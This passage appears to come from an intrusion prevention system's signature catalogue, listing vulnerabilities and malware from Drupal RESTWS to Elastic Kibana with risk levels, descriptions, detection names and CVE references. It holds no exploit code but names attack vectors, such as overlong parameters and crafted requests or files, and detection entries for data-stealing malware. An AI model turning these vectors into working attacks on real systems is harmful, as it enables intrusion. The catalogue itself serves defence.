Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Drupal
Type:	Malfunction
Description:	The callback function in the Drupal RESTWS module can be exploited by sending a crafted HTTP request. A succesful exploit allows an attacker to run arbitrary code on the target.
Situation:	HTTP_CSU-Drupal-Restws-Module-Page-Callback-Remote-Code-Execution

Dsielercha-Trojan

About this vulnerability:	Dsielercha Trojan
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Traffic of the Dsielercha trojan that infects Windows-based systems.
Situation:	HTTP_CRL-Dsielercha-Trojan

Dup-Scout-Enterprise-Login-Buffer-Overflow

About this vulnerability:	A Dup Scout Enterprise Login Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-1032-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Dup Scout
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Dup Scout Enterprise, version 10.0.18, which allows remote attackers to execute arbitrary code via the web interface during login.
Situation:	HTTP_CRL-Dup-Scout-Enterprise-Login-Buffer-Overflow

Dynamicdesktopmedia

About this vulnerability:	DynamicDesktopMedia
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	DynamicDesktopMedia
Type:	Misconfiguration
Description:	DynamicDesktopMedia is a Trojan adware that generates pop-up ads. It is considered a potentially unwanted program.
Situation:	HTTP_CSU-Dynamicdesktopmedia

E-Book-Systems-FlipViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability:

A vulnerability in E-Book Systems FlipViewer ActiveX Control

Risk:

High

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1729-5242

Platform:

Windows

Software:

E-Book Systems FlipViewer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the E-Book Systems ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.

Situation:

HTTP_SS-E-Book-Systems-FlipViewer-ActiveX-Control-Buffer-Overflow

References:

CVE-2007-2919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2919

BID-24328
http://www.securityfocus.com/bid/24328

OSVDB-37042
http://www.osvdb.org/37042

Easy-Chat-Server-User-Registeration-Buffer-Overflow

About this vulnerability:	An Easy Chat Server User Registeration Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-1016-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Easy Chat Server
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Easy Chat Server, versions 2.0 to 3.0, which allows remote attackers to execute remote code through the UserName parameter in register.php.
Situation:	HTTP_CRL-Easy-Chat-Server-User-Registeration-Buffer-Overflow

Easy-Chat-Server-Username-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Easy Chat Server 1.2 and 2.2

Risk:

Moderate

First detected in:

sgpkg-ips-645-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Easy Chat Server

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Easy Chat Server 1.2 and 2.2, via a lone username parameter, which allows a remote attacker to cause a denial of service condition, and possibly execute arbitrary code.

Situation:

HTTP_CRL-Easy-Chat-Server-Username-Buffer-Overflow

References:

CVE-2004-2466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2466

BID-25328
http://www.securityfocus.com/bid/25328

OSVDB-7416
http://www.osvdb.org/7416

Easy-File-Sharing-FTP-Server-BOF

About this vulnerability:

Buffer overflow in Easy File Sharing FTP Server

Risk:

High

First detected in:

sgpkg-ips-642-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Easy File Sharing FTP Server

Type:

Buffer Overflow

Description:

A stack based buffer overflow in Easy File Sharing FTP Server which allows a remote attacker to execute arbitrary code via a long PASS command argument.

Situation:

Shared_FTP-Long-Password

References:

CVE-2006-3952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3952

BID-19243
http://www.securityfocus.com/bid/19243

OSVDB-27646
http://www.osvdb.org/27646

Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow

About this vulnerability:	An Easy File Sharing HTTP Server POST Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-1022-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Easy File Sharing HTTP Server
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Easy File Sharing HTTP Server, version 7.2, which allows remote attackers to execute arbitrary code via a malicious POST to /sendemail.ghp.
Situation:	HTTP_CS-Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow

Easy-Homepage-Edit.cgi-Vulnerability

About this vulnerability:

Easy HomePage Edit.cgi Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-632-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Easy HomePage

Type:

Malfunction

Description:

There exists a vulnerability in Easy HomePage that allows a remote attacker to modify home pages of other users.

Situation:

HTTP_CSU-Easy-Homepage-Edit.cgi-Vulnerability

References:

CVE-2002-1427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1427

BID-5340
http://www.securityfocus.com/bid/5340

Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Eaton HmiSoft VU3

Risk:

Moderate

First detected in:

sgpkg-ips-1271-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton HmiSoft VU3

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Eaton HmiSoft. The vulnerability is due to improper handling of the GIFFILE element in VU3 files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted VU3 file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the HMiSoft process.

Situation:

File-Binary_Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities

About this vulnerability:

A vulnerability in Eaton HmiSoft VU3

Risk:

Moderate

First detected in:

sgpkg-ips-1263-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton HmiSoft VU3

Type:

Buffer Overflow

Description:

Multiple vulnerabilities in Eaton HmiSoft VU3 allow an attacker to execute arbitrary code on the target system.

Situation:

File-Binary_Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Eaton HMiSoft VU3

Risk:

High

First detected in:

sgpkg-ips-1268-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Eaton HmiSoft VU3

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Eaton HMiSoft VU3, versions 3.00.23 and before, which allows remote attackers to execute arbitrary code due to the improper handling of the wMailBlindCopyToLen element in VU3 files.

Situation:

File-Binary_Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Eaton HmiSoft VU3

Risk:

Moderate

First detected in:

sgpkg-ips-1272-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton HmiSoft VU3

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in Eaton HmiSoft. The vulnerability is due to improper handling of the wMailContentLen element in VU3 files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted VU3 file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the HMiSoft process.

Situation:

File-Binary_Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Eaton HMiSoft VU3

Risk:

High

First detected in:

sgpkg-ips-1270-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Eaton HmiSoft VU3

Type:

Buffer Overflow

Description:

Situation:

File-Binary_Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Eaton HmiSoft VU3

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton HmiSoft VU3

Type:

Input Validation

Description:

Improper handling of the wTextLen element in VU3 files causes a buffer overflow vulnerability in Eaton HmiSoft VU3. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

File-Binary_Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow

References:

CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639

Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Eaton Intelligent Power Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1470-5242

Last changed:

sgpkg-ips-1470-5242

Platform:

Generic

Software:

Eaton Intelligent Power Manager

Type:

Input Validation

Description:

Missing input validation causes a cross-site scripting injection vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.

Situation:

HTTP_CRL-Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting

References:

CVE-2021-23282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23282

Eaton-Intelligent-Power-Manager-Savedriverdata-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Eaton Intelligent Power Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1344-5242

Last changed:

sgpkg-ips-1344-5242

Platform:

Generic

Software:

Eaton Intelligent Power Manager

Type:

Directory Traversal

Description:

Insufficient input validation in meta_driver_srv.js causes an arbitrary file deletion vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to delete files on the target system.

Situation:

HTTP_CRL-Eaton-Intelligent-Power-Management-Meta_Driver_Srv-Savedriverdata-Arbitrary-File-Deletion

References:

CVE-2021-23279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23279

Eaton-Intelligent-Power-Manager-System-Command-Injection

About this vulnerability:

A vulnerability in Eaton Intelligent Power Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1253-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton Intelligent Power Manager

Type:

Input Validation

Description:

Insufficient validation of user-supplied strings in requests handled by system_srv.js causes a command injection vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CS-Eaton-Intelligent-Power-Manager-System-Command-Injection

References:

CVE-2020-6651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6651

Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Eaton Intelligent Power Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1383-5242

Last changed:

sgpkg-ips-1383-5242

Platform:

Generic

Software:

Eaton Intelligent Power Manager

Type:

Directory Traversal

Description:

Insufficient input validation in maps_srv.js and node_upgrade_srv.js results in an arbitrary file deletion vulnerabilities in Eaton IPM. A successful exploit allows an attacker to delete arbitrary files on the target system.

Situation:

HTTP_CRL-Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion

References:

CVE-2021-23278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23278

Eaton-Network-Shutdown-Module-Remote-Code-Execution

About this vulnerability:

A vulnerability in Eaton Network Shutdown Module

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eaton Network Shutdown Module

Type:

Malfunction

Description:

There is a PHP code injection vulnerability in Eaton Network Shutdown Module which allows remote attackers to execute arbritrary code.

Situation:

HTTP_CRL-Eaton-Network-Shutdown-Module-Remote-Code-Execution

References:

OSVDB-83199
http://www.osvdb.org/83199

Eaton-Shutdown-Module-DoS

About this vulnerability:	A vulnerability in Eaton Network Shutdown Module
Risk:	Moderate
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Eaton Network Shutdown Module
Type:	Malfunction
Description:	There is a denial of service vulnerability in Eaton Network Shutdown Module
Situation:	HTTP_CSU-Eaton-Shutdown-Module-DoS

Eaton-VURemote-DoS

About this vulnerability:	A vulnerability in Eaton VURemote
Risk:	Moderate
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Eaton VURemote
Type:	Malfunction
Description:	There is a denial of service vulnerability in Eaton VURemote
Situation:	Generic_SS-Eaton-VURemote-DoS

Ebates-Moneymaker

About this vulnerability:	Ebates MoneyMaker
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Ebates MoneyMaker
Type:	Misconfiguration
Description:	Ebates MoneyMaker is an adware that will generate pop-up ads and can perform other unwanted or harmful actions, such as installing or uninstalling other software.
Situation:	HTTP_CSU-Ebates-Moneymaker HTTP_CSH-Ebates-Moneymaker

Ebcrypt-ActiveX-Arbitrary-File-Overwrite

About this vulnerability:

Ebcrypt ActiveX Arbitrary File Overwrite Vulnerability.

Risk:

High

First detected in:

sgpkg-ips-677-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

ebCrypt

Type:

Directory Traversal

Description:

A vulnerability exists in ebCrypt ActiveX 2.0 which allows remote attackers to create or overwrite arbitrary files via a full pathneame in the argument to the SaveToFile method.

Situation:

File-Text_Ebcrypt-ActiveX-Arbitrary-File-Overwrite

References:

CVE-2007-5110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5110

BID-25787
http://www.securityfocus.com/bid/25787

OSVDB-37736
http://www.osvdb.org/37736

Ebury-SSH-Backdoor-Activity

About this vulnerability:	Ebury SSH Rootkit backdoor detected
Risk:	High
First detected in:	sgpkg-ips-1729-5242
Last changed:	sgpkg-ips-1729-5242
Platform:	Linux
Software:	Ebury SSH Rootkit
Type:	Input Validation
Description:	Ebury SSH version string has been detected. The victim host has likely been compromised. Ebury is a SSH rootkit/backdoor trojan for Linux and Unix-style operating systems (like FreeBSD or Solaris).
Situation:	SSH_Ebury-SSH-Client-Backdoor-Activity Generic_CS-Ebury-SSH-Backdoor-Activity

Ecava-IntegraXOR-DoS-CVE-2014-0753

About this vulnerability:

A vulnerability in Ecava IntegraXor

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IntegraXOR

Type:

Malfunction

Description:

There is a denial of service vulnerability in Ecava IntegraXor

Situation:

HTTP_CSU-Ecava-IntegraXOR-CVE-2014-0753

References:

CVE-2014-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0753

OSVDB-102171
http://www.osvdb.org/102171

Ecava-IntegraXOR-SCADA-Information-Leak

About this vulnerability:	A vulnerability in Ecava IntegraXOR
Risk:	High
First detected in:	sgpkg-ips-610-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	IntegraXOR
Type:	Input Validation
Description:	There is an information disclosure vulnerability in Ecava IntegraXOR.
Situation:	HTTP_CRL-Ecava-IntegraXOR-SCADA-Information-Leak

Echo-Request-Modem-Hangup

About this vulnerability:

ICMP Echo request (type 8, code 0) with modem hangup code

Risk:

Low

First detected in:

sgpkg-ips-561-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

<os>

Type:

Input Validation

Description:

An ICMP Echo request (type 8, code 0) with modem hangup code has been detected. Some legacy dial-up systems do not implement proper guard time protection, making them vulnerable for remote modem command execution.

Situation:

ICMP_Echo-Request-Modem-Hangup

References:

CVE-1999-1228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1228

Eclipse-Equinoxe-OSGi-Console-Command-Execution

About this vulnerability:	An Eclipse Equinoxe OSGi Console Command Execution vulnerability
Risk:	High
First detected in:	sgpkg-ips-1071-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux; Windows
Software:	Eclipse Equinoxe OSGi
Type:	Input Validation
Description:	A vulnerability in Eclipse Equinoxe OSGi which allows remote attackers to execute arbitrary commands on a remote system via the fork command.
Situation:	Telnet_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution Generic_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution

Eclipse-Foundation-Jetty-Web-Server-Httpparser-Remote-Information-Disclosure

About this vulnerability:

A vulnerability in Eclipse Foundation Jetty Web Server

Risk:

High

First detected in:

sgpkg-ips-633-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Jetty Web Server

Type:

Malfunction

Description:

An information disclosure vulnerability exists in Eclipse Foundation Jetty Web Server. The vulnerability is due to improper parsing of HTTP requests that can lead to information disclosure via HTTP responses from the server. A remote unauthenticated attacker can exploit this vulnerability by sending HTTP requests containing illegal characters within multiple fields to the vulnerable server. Successful exploitation of the vulnerability will result in disclosing information from the previous requests sent to the server.

Situation:

HTTP_CSH-Invalid-Ascii-In-HTTP-Header

References:

CVE-2015-2080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080

BID-72768
http://www.securityfocus.com/bid/72768

OSVDB-118744
http://www.osvdb.org/118744

Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650

About this vulnerability:

A vulnerability in Eclipse Mosquitto

Risk:

Moderate

First detected in:

sgpkg-ips-1869-5242

Last changed:

sgpkg-ips-1869-5242

Platform:

Generic

Software:

Eclipse Foundation Mosquitto

Type:

Malfunction

Description:

A bypass for pattern based access control lists exists in Mosquitto versions before 1.4.12. An attacker could exploit this to access MQTT topics by using a crafted username or client id.

Situation:

Generic_CS-Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650

References:

CVE-2017-7650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7650

Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow

About this vulnerability:

A vulnerability in Eclipse Foundation Mosquitto

Risk:

Moderate

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Eclipse Foundation Mosquitto

Type:

Input Validation

Description:

There exists a stack overflow vulnerability in Eclipse Mosquitto. Successful exploitation could lead in denial of service conditions on the target server.

Situation:

Generic_CS-Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow

References:

CVE-2019-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11779

ed2k-Peer-To-Peer-Network-Usage

About this vulnerability:	ED2K peer-to-peer network usage
Risk:	Moderate
First detected in:	sgpkg-ips-21-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic P2P
Type:	Peer-to-Peer
Description:	Ed2k is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors. Popular clients include eDonkey2000 and eMule.
Situation:	P2P-TCP_ed2k-Connect-To-Server P2P-TCP_ed2k-Connect-To-Peer

Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316

About this vulnerability:

A vulnerability in Edimax IC-7100 IP cameras

Risk:

High

First detected in:

sgpkg-ips-1853-5242

Last changed:

sgpkg-ips-1853-5242

Platform:

Generic

Software:

Edimax IP Camera

Type:

Input Validation

Description:

An OS command injection vulnerability in Edimax IC-7100 IP cameras allows an attacker to execute arbitrary commands via a crafted HTTP request.

Situation:

HTTP_CRL-Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316

References:

CVE-2025-1316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1316

EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method

About this vulnerability:

Unsafe method in EDraw Office ActiveX Component

Risk:

Low

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EDraw Office Viewer

Type:

Malfunction

Description:

There is an unsafe method exposed in the EDraw Office Viewer ActiveX component. It is possible to delete files from the current user by exploiting this vulnerability.

Situation:

HTTP_SS-EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
File-Text_EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method

References:

CVE-2007-3168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3168

BID-24230
http://www.securityfocus.com/bid/24230

OSVDB-36044
http://www.osvdb.org/36044

EDraw-Office-Viewer-OpenWebFile-Arbitrary-Program-Execution

About this vulnerability:

A vulnerability in EDraw Office Viewer ActiveX control

Risk:

High

First detected in:

sgpkg-ips-202-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

EDraw Office Viewer

Type:

Input Validation

Description:

There is an arbitrary program download and execution vulnerability in the EDraw Office Viewer ActiveX control. The design of the OpenWebFile() method is insecure, allowing the control to download and execute arbitrary executables. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted web page. An attack targeting this vulnerability can result in the download and execution of an arbitrary executable program of the attacker's choice. Any downloaded code is executed in the security context of the currently logged in user.

Situation:

HTTP_SS-EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call
File-Text_EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call

References:

BID-33242
http://www.securityfocus.com/bid/33242

EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169

About this vulnerability:

A vulnerability in EDraw PDF Viewer

Risk:

Moderate

First detected in:

sgpkg-ips-1788-5242

Last changed:

sgpkg-ips-1788-5242

Platform:

Generic

Software:

EDraw PDF Viewer

Type:

Malfunction

Description:

An insecure ActiveX method in EDraw PDF Viewer versions before 3.2.0.126 can be leveraged for remote code execution via a crafted HTML document.

Situation:

File-Text_EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169

References:

CVE-2009-2169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2169

EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow

About this vulnerability:	An EFS Software Easy File Management Web Server UserID Buffer Overflow vulnerability
Risk:	High
First detected in:	sgpkg-ips-1008-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	EFS Software Easy File Management Web Server
Type:	Buffer Overflow
Description:	A buffer overflow vulnerability in Easy File Management Web Server which allows remote attackers to execute arbitrary code by sending crafted HTTP requests to the vulnerable server, due to a boundary error when handling UserID cookies.
Situation:	HTTP_CSH-EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow

EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in EFS Software Easy File Sharing Web Server
Risk:	Moderate
First detected in:	sgpkg-ips-944-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	EFS Software Easy File Sharing Web Server
Type:	Input Validation
Description:	There exists a stack buffer overflow in the EFS Software Easy File Sharing Web Server. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow

EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow

About this vulnerability:

A vulnerability in EFS Software Easy File Sharing Web Server

Risk:

Moderate

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EFS Software Easy File Sharing Web Server

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in EFS Software Easy File Sharing Web Server that can be exploited by sending an overly long USERID parameter to the vulnerable server. Successful exploitation could lead to remote code execution.

Situation:

HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow

References:

CVE-2014-3791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3791

BID-67406
http://www.securityfocus.com/bid/67406

OSVDB-106965
http://www.osvdb.org/106965

EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow

About this vulnerability:	A vulnerability in EFS Software Easy File Sharing Web Server
Risk:	High
First detected in:	sgpkg-ips-1075-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	EFS Software Easy File Sharing Web Server
Type:	Buffer Overflow
Description:	There exists a buffer overflow vulnerability in EFS Software Easy File Sharing Web Server. A remote, unauthenticated attacker could use this to execute arbitrary code under the security context of the user.
Situation:	HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow

EICAR-AntiVirus-Test-File

About this vulnerability:	EICAR antivirus detection test file
Risk:	Low
First detected in:	sgpkg-ips-127-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Any Software
Type:	Malfunction
Description:	The EICAR antivirus detection test file is a harmless file that is used to test reporting and alerting functions of antivirus products.
Situation:	Shared_EICAR-AntiVirus-Test-File E-Mail_BS-EICAR-AntiVirus-Test-File HTTP_SS-EICAR-AntiVirus-Test-File File-OLE_EICAR-AntiVirus-Test File-Flash_EICAR-AntiVirus-Test File-PDF_EICAR-AntiVirus-Test File-Binary_EICAR-AntiVirus-Test HTTP_SHS-EICAR-AntiVirus-Test-File File-Text_EICAR-AntiVirus-Test-File File-Text_EICAR-AntiVirus-Test2 File-JPEG_EICAR-AntiVirus-Test File-PNG_EICAR-AntiVirus-Test File-GIF_EICAR-AntiVirus-Test File-RTF_EICAR-AntiVirus-Test File-RIFF_EICAR-AntiVirus-Test File-TextId_EICAR-AntiVirus-Test File-MPEG_EICAR-AntiVirus-Test File-Zip_EICAR-AntiVirus-Test File-Exe_EICAR-AntiVirus-Test

eIQnetworks-ESA-Buffer-Overflow

About this vulnerability:

An eIQnetworks ESA Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-734-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

eIQNetworks ESA

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in eIQnetworks ESA, versions before 2.5.0, which allows remote attackers to execute arbitrary code via a long DELETEDEVICE and LICMGR_ADDLICENSE commands.

Situation:

Generic_CS-eIQnetworks-ESA-Buffer-Overflow

References:

CVE-2006-3838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3838

BID-19163
http://www.securityfocus.com/bid/19163

OSVDB-27526
http://www.osvdb.org/27526

Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection

About this vulnerability:	An Eir D1000 Wireless Router WAN Side Remote Command Injection vulnerability
Risk:	High
First detected in:	sgpkg-ips-941-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	A code injection vulnerability in Eir D1000 Wireless Routers that allow remote attackers access to the web admin interface from the WAN side of the modem by using crafted TR-064 commands.
Situation:	HTTP_CS-Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection

Ekeoil-Malware-C2-Traffic

About this vulnerability:	Ekeoil malware C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1131-5242
Last changed:	sgpkg-ips-1758-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Ekeoil is a malicious program with information exfiltration capabilities.
Situation:	HTTP_CRL-Ekeoil-Malware-C2-Traffic HTTP_CSH-Ekeoil-Malware-C2-Traffic

Ektron-CMS-XSLT-Transform-Remote-Code-Execution

About this vulnerability:

An Ektron CMS XSLT Transform Remote Code Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2003 SP2

Software:

Ektron CMS

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Ektron CMS, version 8.02 (before SP5), which allows remote attackers to execute arbitrary code with NETWORK SERVICE privileges.

Situation:

HTTP_CRL-Ektron-CMS-XSLT-Transform-Remote-Code-Execution

References:

CVE-2012-5357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5357

BID-56816
http://www.securityfocus.com/bid/56816

OSVDB-88107
http://www.osvdb.org/88107

Elastic-ElasticSearch-Snapshot-API-Directory-Traversal

About this vulnerability:

A vulnerability in Elastic Elasticsearch

Risk:

Moderate

First detected in:

sgpkg-ips-990-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ElasticSearch

Type:

Directory Traversal

Description:

Insufficient validation of the path in a snapshot request causes a directory traversal vulnerability in ElasticSearch. A successful exploit allows arbitrary file contents to be accessed remotely without authentication.

Situation:

HTTP_CSU-Elastic-ElasticSearch-Snapshot-API-Directory-Traversal

References:

CVE-2015-5531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531

Elastic-Kibana-Server.js-Local-File-Inclusion

About this vulnerability:

A vulnerability in Elastic Kibana

